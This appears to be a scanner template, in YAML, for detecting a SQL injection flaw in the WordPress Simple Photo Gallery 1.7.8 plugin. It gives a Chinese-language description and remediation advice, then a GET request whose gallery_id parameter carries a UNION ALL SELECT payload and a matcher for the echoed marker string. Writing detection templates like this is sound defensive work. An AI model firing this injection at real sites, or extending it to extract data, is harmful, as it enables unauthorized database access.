id: Wordpess-wppg_photo_details_gallery_id-SQLi
info:
  name: Wordpess Simple Photo Gallery 1.7.8 -wppg_photo_details__gallery_id参数 sql注入漏洞
  author:
  - l0ne1y
  description: |+
    WordPress Plugin Simple Photo Gallery ‘index.php’SQL注入漏洞
    WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。Simple Photo Gallery是其中的一个图像库插件。

    WordPress Simple Photo Gallery插件中存在SQL注入漏洞，该漏洞源于程序在构造SQL查询语句之前没有充分过滤用户提交的输入。攻击者可利用该漏洞控制应用程序，访问或修改数据，或利用底层数据库中潜在的漏洞。WordPress Simple Photo Gallery插件1.7.8版本中存在漏洞，其他版本也可能受到影响。

  reference:
  - https://www.exploit-db.com/exploits/37113/
  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/plugins/simple-photo-gallery/changelog/

    临时修复方案：
    1、使用预编译语句，使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
    2、对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。
    3、确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。
    4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
    5、网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
    6、严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
    7、避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
    8、过滤危险字符，例如：采用正则表达式匹配union、sleep、and、select、load_file等关键字，如果匹配到则终止运行。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,"qvxpqvWkXcvyKumqpzqq")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wppg_photogallery/wppg_photo_details/?gallery_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x7176787071,0x76576b586376794b756d,0x71707a7171)--&image_id=1'
  method: GET
